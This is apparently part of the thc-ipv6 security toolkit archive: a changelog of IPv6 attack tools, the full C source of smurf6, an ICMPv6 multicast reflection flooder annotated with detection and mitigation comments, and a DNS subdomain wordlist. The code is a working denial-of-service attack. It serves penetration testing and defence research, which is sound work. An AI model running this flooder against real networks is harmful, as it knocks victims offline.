0ustar rootrootCHANGELOG ========= NOTE: More tools exist, but are only handed out to specific people who develop ipv6 security/pentest tools themselves, or support the thc-ipv6 
toolkit development. If this matches *you* send me an email to vh (at) thc (dot) org , with "thc-ipv6 antispam" in the subject line. v2.5 public release (30C3) => see 2.4 v2.4 private release * Moved the license from GPLv3 to AGPLv3 (see LICENSE file) * Support for big endian processors added * Added new tool: fuzz_dhcps6 - DHCPv6 server fuzzer. Submitted by Brandon Hutcheson and Graeme Neilson - great job, thanks! * Added new tool: flood_redir6 - flooding with ICMPv6 redirects * Added new tool: flood_rs6 - flooding with ICMPv6 Router Soliciations * Added new tool: four2six - send an IPv4 packet via a 4to6 gateway * Added new tool: dump_dhcp6 - show all DHCP6 servers and their config * Added new script: six2four.sh - send an IPv6 packet via a 6to4 gateway * All flooding tools: - support now a specific target instead of all local nodes - printing a dot for each 1000 packets sent (before: 100) * alive6: - renamed option -D to -C (common address scan), -D still works too - added -4 IPv6address/range option - added -H option to print the hop count value of received packets - added -L option to only report local alive systems - added -P option to only print addresses that would be scanned, but no scanning - added -R option to not consider TCP-RST packets as alive signals - NDP alives now also get their MAC addresses printed - reworked help output, simple help screen with no option, full help with -h parameter - clarified that ranges (from-to) should not be used together with -D -M or -4 - -W option waited for micro not milliseconds, fixed * flood_router26 - added -S slow start option which makes the flooding a bit more effective - added -G gigantic packet option (64kb, fragmented) - increased number of route/prefix entries in normal (non -G option) packets - rewrote the help screen * thcsyn6: - changed to also allow syn flooding on link local * parasite6: - added ROUTER flag to all packets to prevent being removed from the routing list * trace6: - added -u UDP switch - 
fixed bug that showed targets sometimes too far away - fixed -E option - fixed millisecond printing * thcping6: - added -n count switch - added -T icmptype and -C icmpcode options - rewrote help output, added -h extra output, minimal otherwise * dnsdict6: - enhanced and updated the dictionaries - added additional "u"ber large dictionary with -u option * fragmentation6: - added multi-level-fragment tests - no screen flooding in flooding mode anymore * fake_solicitate6 - src address is now by default the own link-local address unless specified differently * firewall6: - added -H option to show hop count of pkts received * randicmp6: - added -p option which will not print replies and not wait (good for flooding tests) * thc-ipv6-lib: - added thc_add_ipv4_rudimentary function needed for the new four2six tool, so far only ICMPv4 ping and UDP are supported. - renamed thc_create_ipv6 to thc_create_ipv6_extended, and added a simpler thc_create_ipv6 function - 802.1Q VLAN IDs can now have the proper range of up to 4095 - injection sniffing - some tcpdump seem not to be able to sniff on ether proto * massive error checking and compiler warnings eliminated * Updated documentation and man page * Incorporated Debian maintainer patches: man page additions and spelling fixes v2.3 public release (released) v2.2 private release * Added new tool: thcsyn6 - a TCP flooding tool * Added new tool: redirsniff6 - redirects traffic (sniff variant to redir6) * Added new script: thc-ipv6-setup.sh - configuring Linux for thc-ipv6 * Added new script: 6to4test.sh - check an ipv4 address for dynamic 6to4 tunnel * flood_router26: added -s option for small lifetime which makes the attack even more devastating * trace6: - added -B option for sending echo reply packets (will not show the destination) - added -E option for sending destination headers with invalid option * thcping6: - -U/-S port options now also set the source port - -U/-S options now also send data if given - -f fragment option can now be 
used multiple times * implementation6: - fixed bug in test case - added icmp6 type/code printing for error replies * fake_advertise6: more command line options to control all necessary aspects * toobig6: added -u option to allow testing for unrelated ICMPv6 packet firewall bypasses * firewall6: added more test cases * thc-ipv6-lib: - fixed address selection bug if both global and ULA addresses were present - changed NDP to use ff02::1:ffxx:xxx limited multicast addresses - thc_resolve6 ignores now anything after a "/" or in before/after "[]" * copied alive26 to alive6 * in new alive26: - hidden portscan option (-s "portscan") to be able to TCP-SYN portscan in injection environments - new option -x to define the source port for tcp and udp packets - new option -T allows sending a fixed string as a packet tag in the data v2.1 * alive6 + alive26: ranges are now supported in the input file too * added dnssecwalk to the thc-ipv6 package and included IPv6+IPv4 resolving * parasite6: enhancements to make it way more effective * fake_router26: added overlap RA guard evasion type (-E o, -E O) * dos-new-ip6: fix that only DAD replies are sent, not full NDP spoofing :-) (thanks to Johannes Weber for reporting) * flood_router26: Added local LAN privacy extension prevention attack by George Kargiotakis * randicmp6: - added function which dumps icmp answers received - added funtionality to send a specific type (and also code) * dnsdict6: added SRV result address resolving * trace6: fix for routers which add padding to the packets * fuzz_ip6: added -X option for not sending a transport layer * firewall6: - two more overlapping test cases - source port test cases * fake_advertise6: when no srcmac was specified, it was sent as all zeroes instead of the real mac (thanks to Jannes Weber for reporting) * inject_alive6: added -a option to allow selective active alive sending * thc-ipv6-lib: added function thc_send_as_overlapping_{first,last}_fragment6 * Added GPL exception clause to 
license to allow linking to OpenSSL - debian people need this * Makefile: added patch from gentoo maintainers v2.0 - PUBLIC * Added VLAN-Q, PPPoE and 6in4 injection support! See the file HOWTO-INJECT for details * added new tool: inject_alive6 - keeps a PPPoE/6in4 tunnel alive if you disconnect the client tunnel endpoint * added new tool: ndpexhaust26 - very performant ndp exhauster based on ICMP error toobig messages but can send many types of packets * added new tool: firewall6 - various TCP/UDP ACL bypass test cases * added new tool: fake_pim6 - send fake hello and join/prune pim messages * alive26: - added support for replies with fragmentation header - -s/-a/-u options would send also bad dst hdr packets, fixed - having a '-' in the dns name was not working * trace6: - added -b option for stealthy tracerouting - fixed -a option reply packet analysis - added -F and -D options to add frag & dst headers, not documented - if the destination is not reached, print three ??? entries and warn * thcping6: - added -D xxx fragmenting large destination header option - added -q for hop-by-hop quickstart option * fake_dns6d: specified a wrong listen port, silly me * fake_router26: added -L DNS searchlist option * fuzz_ip6: - RA: added DNS searchlist, and extended flag options - added node information query fuzzing (-0), renamed TCP fuzzing to -s * toobig6: no restriction on mtu value anymore * dnsrevenum6: switched the output printing order * exploit6: fixed a crash in test case 4 * implementation6: enhancements to not run into icmp error rate limiting * thc-ipv6-lib: - more intelligent source address selection - fixed crash in toobig function - better support of broken fragmentation implementations - added thc_add_pim() function and overall PIM packet creation * OpenSSL is now optional, if not present, comment out HAVE_SSL in the Makefile * added trace62list.sh and create_network_map.sh to create network topology map images from trace6 output files v1.9 - PUBLIC * added 
new tool: detect_sniffer6 (Windows, Linux, *BSD, OS X, ...) * added new tool: connect6 for various IPv6 TCP connection stuff * added new tool: fake_router26 which gives more control on options * added new tool: dnsrevenum6 which reverse enumerates the DNS * added new tool: inverse_lookup6 which gets the IPv6 addresses of a mac address * added new tool: fake_solicitate6 which lets you fake neighbor solicitation packets * added new tool: address6 converts between ipv6 <=> ipv4 and mac addresses * added new tool: flood_router26, more effective by many prefix & route entries in each packet * added new tool: passive_discovery6 which detects all sending systems and includes DAD detection * alive26: - new -I srcip6 option to allow choosing the source IPv6 address to use - fixed a bug in alive26 for hop-by-hop option - expanded waiting time for link local scans - now returns 0 when hosts were found alive, 1 when not (for alive scripting) * parasite6: - fixed a crash when -F and -R were used together - parasite6 now terminates as it should, also ending children when using -l - the mac command line parameter was not working * fuzz_ip6: - added TCP (-0 port) to the fuzzer with tstamp, mss + wscale options - return code 0 on tests done and target alive, 1 on target crashed * thcping6: - added -U udp option - return code -1 no reply, 0 reply, 1 error reply * implementation6: - added more tests (AH + ESP ping tests, 8k exthdr, 2k exthdr size) - fixes for some tests - returns -1 on errors, 0 if at least one reply, 1 if no or only error replies * detect-new-ip6: now the interface is passed as 2nd cmdline option to the script * dnsdict6: - added full SRV service scan support (-S option) - fix for x64 systems, thanks to alphacc(at)altern(dot)org - some more minor fixes * trace6: - fixed a crash - made it a bit faster - fix for targets further away than 18 hops - enhanced error messages * kill_router6: fixed '*' target option * dos-new-ip6: also DOSes non-link-local addresses now * 
toobig6: fixed crash when mtu size specified was < 47 * send errors don't result in program exits for flood_*, fuzz_ip6 and ndpexhaust6 tools anymore * thc-ipv6-lib: - changed the thc_pcap_function to * have an additional parameter, promisc (before it was not promiscuous) * reduce CPU load, which affects detect-new-ip6, dos-new-ip6 and parasite6 - changed some function defines from/to signed/unsigned * cleaned up the code v1.8 - PUBLIC * included all tools except alive26 v1.7 - PRIVATE * fake_advertise6: added one more ND Security bypass (-D) * fake_router6: - added unicast reply to router solicitation requests - added one more ND Security bypass (-D) * parasite6: - added -R option to also inject the reverse route - added one more ND Security bypass (-D) * flood_router6: one more RA guard bypass (-D) * alive26: - important fix for hopbyhop/dst header packet types (ff02::1)! - expanded dictionary by results from the ipv6 world day scanning * dnsdict6: - expanded dictionary by results from the ipv6 world day scanning - added IPv4 support for selfish reasons. I'm sorry! 
;-) * thcping6: - -D renamed to -F - new -D/-H option to specify options in hopbyhop and destination headers - fragment header moved before other headers (except hop-by-hop) * added new tool flood_solicitate6 * added new tool kill_router6 * added new tool fake_dnsupdate6 * added new tool node_query6 * added new tool dump_router6 * added new tool sendpeesmp6 by Marcin Pohl * added new tool randicmp6 by ecore * added new tool ndpexhaust6 by mario fleischmann * added two alternate alive6/parasite6 tools by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho, it can be found in the contrib/ directory * added helper scripts extract_{network,host}s.sh * speed improvements for flood_* tools * added nmap support to dnsdictalive.sh (needs at least v5.59BETA) * thc-ipv6-lib: - fixed class assignment to ipv6 packet creation - forgot some fclose()es thanks to mario fleischmann for reporting - first OS/X porting diff sent in by oskar (at) acm (dot) org, thanks! v1.6 - PUBLIC * removed various tools for public release v1.5 - PRIVATE * redir6: - TTL enhancement by frederik(at)kriewitz(dot)eu - timing enhancement by me * toobig6: added TTL, timing and packet size enhancement * parasite6: - added -l (loop) option - ND security evasion added :-) * fake_advertise6: - added src ip option - added ND security evasion options * trace6: - added tunnel detection and identification mode (-t) - only up to the 13th hop was reported, fixed - added patch by Phillipe Langlois for -s sourceipv6 option * alive26: - print original dst ports for packet replies - print original dst ipv6 for icmp errors - if -p was specified, sending dst opt error pkt was not disabled * thcping6: rewrote thcping6 for more options and packet timing * fake_router6: - the interface MTU is used as default now - added RA guard evasion options * flood_router6: RA guard evasion options added :-) * frag_id_attack: lots of more tests and cmdline options * implementation6: more test cases * dnsdict6: - implemended 4 
different wordlists in dnsdict6 (-s, -m, -l, -x switches) - better wildcard detection - added -d switch to dump IPv6 NS and MX information - added check for -t max * added comfortable dnsdictalive.sh script to dnsbrute+alivescan a domain * thc-ipv6-lib: - added thc_ipv62notation function - added thc_add_hdr_oneshotfragment function - fixed neighbor mac solicitation function for FreeBSD targets - better own ipv6 address selection * added usage of thc_ipv62notation function to all tools v1.4 - December 2010 - PUBLIC * removed various tools for public release v1.3 - PRIVATE * added covert_send6 and covert_send6d * added fake_dhcps6 - fake dhcp6 server * added flood_dhcpc6 - dhcp6 flooder * added fake_dns6 - fake dns server, serving only one ipv6 address :-) * added fake_mld26 (same as fake_mld6 but for MLDv2) * added flood_mld6 - flood network with mld messages * added flood_mld26 - flood network with mldv2 messages * added fake_mldrouter6 - fake an mld router * added flood_mldrouter6 - flood network with mld router messages * added exploit6 and the first test cases * added denial6 and the first test cases * added dos_mld.sh which disables outside multicast traffic to the local LAN * alive6: - beautified alive ipv6 address output - added -i inputfile and -o outputfile options - added -M for mac enumeration mode (autoconfiguration address space) - added -D for dhcp6 enumeration mode - added range possibility, e.g. 
"alive6 eth0 2002:0-2:0-10" - added -s/-a/-u TCP SYN/ACK and UDP alive scan mode - added -F firewall quick port setup mode (tcp-syn to 22, 25, 80, 443; udp dns request; tcp-ack to highport, ping and destination error) - added -p and -e icmp and error alive check modes - changed hop-by-hop error check to destination error check - alive reply type is now printed - now printing warnings if icmp destination unreachables are received (-v) - added new -S slow, -W waittime, -d resolve, -v verbose switches - added new -Z dstmac option - removed hop check, changed to dst hdr, and made it the default - removed memory leaks * fake_mld6: - added query and done MLD types - new command line option -l = loop - command line format changed - added target mac option, needed for new vulnerability found * dnsdict6: - added 87 more entries to the dictionary - now identifies even multiple wildcard IPs and displays them accordingly - now prints the number of unique IPv6 addresses found * fuzz_ip6: - added fuzzing query, report and done MLD + query and report MLDv2 types - fuzzing first and last two bytes of IPv6 addresses in the packets - command line option for specifying an IPv6 address within the packets - added many options * trace6: - added unreachable detection - added more informative output - now multiple run save - fixed a core dump which happened on rare occasions * changed command line options for fake_router6 to allow specification of DNS * toobig6: tighter mtu and removed debug output still present in the code, oops * implementation6: added three more test cases, enhanced four test cases, bugfix * compile warning fixes (dnsdict6, sendpees6, thc-ipv6-lib) * Makefile beautification and header fixes by xmwgentooorg * library: - BUG: raw mode does not work! 
Needs to be implemented properly by someone :-) - important fix for gathering a local mac, required for Mac OS/X targets - added thc_pcap_init_promisc function (required for new fake_mld6 functionality) - added thc_is_dst_local function (required for new alive6 functionality) - added thc_add_udp function (required for new alive6 functionality) - added thc_bind_udp_port function (required for fake_dhcps6) - added thc_bind_multicast_to_socket (required for fake_dhcps6) - added thc_ipv6_show_errors function to toggle error messages from library - optimization in thc_send_as_fragment6 to only get MACs once :-) - fix for max offset in thc_add_hdr_fragment, plus bad value check - fix for beautification ipv6 address output function - looked for memory leaks and removed all I found - for performance reasons also stale neighbor mac entries are used now - made library thread safe, for this to work I: ~ changed thc_pcap_check/thc_pcap_function to add an option ~ removed some global variables => remaining variables are ok to be global v1.2 - June 2010 * compile fixes * test case added to implementation6 v1.1 - June 2010 * dnsdict6: big wordlist update * upgraded thc-ipv6 license to GPLv3 v1.0 - May 2010 - PRIVATE * beta release v0.9 - April/May 2010 - PRIVATE * added dnsdict6 * added trace6 * added flood_router6 * added flood_advertise6 * added fuzz_ip6 * added implementation6d * implementation6: - renamed from test_implementation6 - added A LOT of test cases and reply checks * fake_router6: - changed command line options - added default route entry (not supported by many systems though) - added DNS server ip (the official dns multicast address) - small fixes * alive6: - small fixes - added -l switch for using the link layer address * library: - fixed a big bug in the routing module, the library sometimes thought a remote network was local! 
- fixed a bug where a hard/permanent set mac for a destination would not be found when the dst is not alive - now chooses an alternate IP6 address when the prefered one is not available (link vs. global) - fixed TTL setting when using raw mode - supporting mobile home address option in dst option (for checksum) - pcap was opened in promisc mode - shouldnt have been, unnecessary - valid icmp checksum for mobile home address and routing pointer == 0 - TCP can be now added as a header too + checksum calculation, but not for inverse_packet (yet - no application for that currently). v0.8 - June 2007 - PRIVATE * Clarified License: GPL 2 * Improved Makefile * Added a man page for all tools together (by gebi(at)grml.org) v0.7 - AUGUST 2006 - BETA * Added sendpees6.c and a patch from willdamn@gmail.com - thanks a lot! (its a new DOS attack) v0.6 - MARCH 2006 - BETA * Added fake_mipv6 tool to spoof mobile ipv6 binding updates * Fixed a bug in the thc_toobig6 and some other thc_ icmp6 lib functions v0.5 - FEBRUARY 2006 - ALPHA * Added RAW mode, just add -r as 1st option to most tools v0.4 - FEBRUARY 2006 - ALPHA * Added fake_mld6 tool v0.3 - JANUARY 2006 - ALPHA * Added detect-new-ip6 tool * Added function to get the mac from the ipv6 neighbor cache, thanks to dan kaminsky * It finally has a README which describes the thc-ipv6-lib.c interface (roughly though, but anyway, now there is at least *something*) v0.2 - NOVEMBER 2005 - ALPHA * First release thc-ipv6-2.5/smurf6.c0000644000000000000000000000360312251022441013077 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip [multicast-network-address]\n\n", prg); printf("Smurf the target with icmp echo replies. 
Target of echo request is the\n");
  printf("local all-nodes multicast address if not specified\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * smurf6 entry point.
 *
 * Builds one ICMPv6 echo request and retransmits the same frame in an endless
 * loop. Going by the help text and the (victim6, multicast6) argument order of
 * thc_create_ipv6_extended(), the victim is used as the IPv6 source and the
 * multicast group (default ff02::1) as the destination, so every node that
 * answers sends its echo reply to the victim.
 *
 * What a defender can key on, taken from the constants below:
 *   - echo requests addressed to a multicast group whose IPv6 source does not
 *     belong to the port/host that emitted the frame;
 *   - the fixed MAC 00:00:de:ad:be:ef (fakemac is passed to
 *     thc_generate_pkt(); presumably as the Ethernet source, confirm against
 *     thc-ipv6.h);
 *   - a 16-byte payload of 'A' and the constant 0xfacebabe handed to
 *     thc_add_icmp6() (presumably the echo id/sequence field, confirm).
 * First-hop source-address validation (IPv6 source guard / SAVI style
 * bindings) and ICMPv6 rate limiting on the responders are the usual
 * mitigations for this traffic pattern.
 *
 * Returns -1 if the packet cannot be built; exits with -1 on a bad interface
 * or when frame generation fails. The send loop never terminates on its own.
 */
int main(int argc, char *argv[]) {
  /* fakemac: six MAC bytes plus the string literal's terminating NUL */
  unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef";
  unsigned char *multicast6, *victim6;
  int pkt_len = 0;
  char *interface;
  int rawmode = 0;  /* set when -r is given, but not read again in this function */

  /* needs at least "interface victim-ip"; help() does not return (it calls exit) */
  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  /*
   * -r is still accepted although the usage line for it is commented out in
   * help().
   * NOTE(review): argc is not re-checked after the shift. Invoked as
   * "<prog> -r <iface>", argv[2] becomes the NULL terminator and argv[3]
   * below is read past the end of the argv array.
   */
  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  /* the interface is considered valid when an own IPv6 address can be found on it */
  interface = argv[1];
  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  /*
   * NOTE(review): neither thc_resolve6() result is checked, although the call
   * can return NULL (four2six.c in this archive tests for it). An unresolvable
   * argument is passed straight into packet creation; how the library treats
   * a NULL address is not visible here.
   */
  victim6 = thc_resolve6(argv[2]);
  if (argv[3] != NULL)
    multicast6 = thc_resolve6(argv[3]);
  else
    multicast6 = thc_resolve6("ff02::1");

  /* constant payload: 16 bytes of 'A' */
  memset(buf, 'A', 16);
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  /* &buf has the same address as buf; the cast only changes the pointer type */
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Starting smurf6 attack against %s (Press Control-C to end) ...\n", argv[2]);
  /* unpaced resend of the same frame; the return value of thc_send_pkt() is ignored */
  while (1)
    thc_send_pkt(interface, pkt, &pkt_len);

  return 0;  /* not reached: the loop above has no exit */
}
thc-ipv6-2.5/dnsdict6.h0000644000000000000000000112546512251022433013415 0ustar rootroot
/* * dnsdict.h (c) 2013 by van Hauser / THC * */
// built-in list of hostnames
char *sub_small[] = { "6", "6net", "6to4", "admin", "blog", "blog6", "dev", "dns", "dns1", "dns2", "email", "exchange", "firewall", "ftp", "fw", "gate", "gateway", "gw", "gw6", "host", "host1", "host10", "host11", "host12", "host2", "host3", "host4", "host5", "host6", "host7", "host8", "host9", "imap", "ip6", "ipv6", "ipv6-gw", "ipv6-router", "ipv6gw", "irc", "mail", "mail1", "mail2", "mail3", "mail6", "mailgate", "mailhost", "mx", "mx1", "mx2", "mx3", "mx6", "net", "news", 
"ns", "ns1", "ns2", "ns3", "nsv6", "ntp", "ntp1", "office", "owa", "pc1", "pc2", "pc3", "pop", "pop3", "portal", "proxy", "remote", "router", "secure", "server", "server1", "smtp", "smtp2", "sql", "support", "test", "time", "tunnel", "v6", "v6gw", "v6www", "video6", "vpn", "vps", "web", "web1", "webmail", "wiki", "www", "www-6", "www-ipv6", "www-v6", "www1", "www2", "www6", "wwwipv6", "wwwv6", "" }; char *sub_medium[] = { "0", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d", "1e", "1f", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "2b", "2c", "2d", "2e", "2f", "3", "30", "31", "32", "33", "34", "35", "36", "37", "38", "39", "3b", "3c", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4c", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6b", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9b", "9c", "9d", "9e", "9f", "a", "a0", "a1", "a2", "a20", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "ab", "abc", "ac", "access", "ad", "admin", "adns1", "adsl", "ae", "ae-0", "ae-1", "ae-2", "af", "agenda", "agent", "ak", "alice", "allen", "alpha", "amanda", "ams-core-1", "antares", "ap", "apache", "api", "apollo", "app", "app1", "apple", "apply", "apps", "ar01", "ar02", "ares", "as", "as0", "as1", "asterix", "athena", "atlantis", "atlas", "atom", "auth", "autodiscover", "av", "avalon", "b", "b0", "b1", "b2", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "backup", "backups", "banana", "barracuda", "bart", "bb", "bbs", "bbs6", "bc", "bcast", "bd", "be", "bender", "beta", "bf", "billing", "black", 
"blade", "blog", "blog6", "blogs", "blue", "bm0", "bm1", "bm2", "bnc", "bob", "bot", "brain", "broadcast", "bt", "bt6", "bug", "bugs", "bugzilla", "build", "c", "c0", "c1", "c2", "c3", "c4", "c5", "c6", "c7", "c8", "c9", "ca", "cache", "calendar", "callisto", "calypso", "cam", "cas", "casper", "cat", "catalog", "cb", "cc", "ccxvii", "cd", "ce", "centos", "cert", "cf", "cgi", "ch", "charlie", "charon", "chat", "chicago", "chris", "chronos", "ci", "ci53", "ci96", "cisco", "cisco2", "citrix", "client", "cloud", "clyde", "cm0", "cm1", "cms", "cn", "code", "conf", "conference", "connect", "console", "contact", "core", "core1", "correo", "cp", "cr1", "cr2", "cricket", "crm", "cs", "customer", "cvs", "d", "d0", "d1", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d69", "d7", "d70", "d72", "d73", "d74", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "data", "db", "db1", "db2", "dc", "dd", "de", "debian", "decix", "defiant", "dell", "delta", "demo", "demon-gw", "desktop", "dev", "devel", "df", "dh", "dhcp", "dhcp-pool", "diana", "dict", "dione", "directory", "dl", "dns", "dns0", "dns01", "dns02", "dns1", "dns2", "dns3", "dns4", "dnscache1", "dnscache2", "doc", "docs", "download", "downloads", "dragon", "drupal", "ds", "dsl", "e", "e0", "e1", "e2", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eagle", "earth", "eb", "ec", "echo", "ed", "edge", "edu", "ee", "ef", "efnet", "em", "email", "en", "eng", "enigma", "enterprise", "epp", "eprints", "es", "et", 
"eth0", "eth1", "europa", "eve", "events", "ex", "exchange", "exeter", "extranet", "f", "f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa0-0", "falcon", "fax", "fb", "fc", "fd", "fe", "fe0-0", "ff", "fi", "fiberlink", "fido", "files", "finger", "firewall", "flash", "flow", "forum", "forums", "fox", "foxtrot", "frank", "fred", "freebsd", "fry", "fs", "ftp", "ftp1", "ftp2", "ftp3", "ftp6", "fw", "fw1", "fw2", "g", "gaia", "galatea", "gallery", "gamma", "gandalf", "gate", "gatekeeper", "gateway", "gauss", "gc", "ge-0", "gemini", "gentoo", "gh", "git", "gk", "go", "gold", "golf", "gopher", "green", "guest", "guide", "gw", "gw01", "gw1", "gw2", "gw6", "h1", "ha", "hades", "hal", "he", "helene", "help", "helpdesk", "hera", "hermes", "hg", "hh", "hobbes", "home", "homer", "host", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", "host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", "host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosting", "hotel", "hotspot", "hp", "hq", "http", "hwmaint", "hydra", "hyperion", "i", "ice", "ict", "id", "idp", "ids", "if-0-0-0", "if-10-0-0", "ik", "im", "images", "imap", "imap4", "imaps", "img", "inferno", 
"info", "int", "intern", "internal", "internet", "intra", "intranet", "io", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip2", "ip3", "ip4", "ip5", "ip6", "ip6test", "ip7", "ip8", "iphone", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6gw", "ipv6test", "irc", "irc6", "ircd", "iris", "irssi", "is", "isis", "it", "ix", "ix-2-2", "j", "jabber", "janus", "java", "jg", "jobs", "jupiter", "k", "kb", "kdc1", "kepler", "kerberos", "keyserver", "king", "kk", "kst-core-1", "l0", "l1", "lab", "labs", "lan", "laptop", "lc", "ldap", "ldap1", "ldap2", "learn", "leo", "lg", "lib", "library", "lim-core-1", "linux", "lisa", "list", "listes", "lists", "listserv", "live", "lo-1", "lo0", "lo0-0", "lo1", "local", "localhost", "log", "logger", "loghost", "login", "logs", "loki", "london", "loop0", "loopback0", "lotus", "lu", "lxxxix", "m", "m1", "mail", "mail01", "mail02", "mail03", "mail1", "mail10", "mail11", "mail12", "mail2", "mail3", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "mailer", "mailgate", "mailgw", "mailhost", "mailin", "mailing", "mailout", "mailserver", "mailtest", "main", "manage", "management", "map", "maps", "mars", "marvin", "master", "max", "maxwell", "me", "media", "member", "members", "mercury", "merlin", "meta", "mickey", "mike", "miranda", "mirror", "mirrors", "ml", "mm", "mobile", "mon", "monitor", "monitoring", "moodle", "moon", "mordor", "moria", "mout", "mp3", "mr", "mrtg", "ms", "ms1", "mta", "mta1", "mta2", "munin", "music", "mx", "mx0", "mx01", "mx02", "mx03", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx4", "mx5", "mx6", "mx7", "mx8", "mx9", "my", "mysql", "mysql1", "n", "na", "nagios", "name", "nat", "neon", "neptun", "neptune", "net", "netlab", "network", "new", 
"news", "newsfeed", "newsletter", "newton", "nfs", "nic", "nm", "nms", "nntp", "no", "noc", "ns", "ns-ext", "ns0", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "nsa", "nsauth1", "nscache", "nscache1", "nss", "nsv6", "ntp", "ntp0", "ntp1", "ntp2", "null", "o1", "oa", "oberon", "office", "old", "omega", "online", "open", "openbsd", "openvpn", "ops", "oracle", "orange", "orion", "oscar", "outbound", "outlook", "owa", "ox", "p", "packages", "page", "pan", "panda", "panoramix", "papa", "partner", "pbx", "pc", "pc1", "pc10", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", "pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc5", "pc6", "pc7", "pc8", "pc9", "pe", "peach", "pegasus", "people", "pgp", "phi", "phobos", "phoenix", "phone", "photo", "photos", "php", "pics", "pictures", "pipex-gw", "pki", "pluto", "pm", "po-1", "po-2", "poczta", "pop", "pop3", "pop3s", "portal", "pos1-0", "post", "posta", "pptp", "printer", "project", "projects", "prometheus", "proxy", "proxy1", "proxy2", "ps", "pub", "public", "puck", "q", "qa", "r", "r00", "r01", "r02", "r1", "r2", "ra", "radio", "radius", "radius1", "radius2", "rc", "red", "redhat", "register", "relay", "relay1", "relay2", "remote", "reports", "res1", "research", "resolv1", "resolver", "resolver1", "resolver2", "ripe", "rm", "robert", "root", "rose", "router", "rp", "rss", "rsync", "rt", "rt2", "rtr", "rwhois", "s", "s0", "s1", "s2", "s3", "s4", "s5", "sa", "sales", "sam", "sandbox", "sap", "sara", "saturn", "sbs", "sc", "scanner", "scotty", "se", "search", "secure", "security", "serial", "server", "server01", "server1", "server2", "server3", "server4", "server5", "service", "services", "sf", "sftp", "sh", "sharepoint", "shell", "shop", "sigma", "silver", 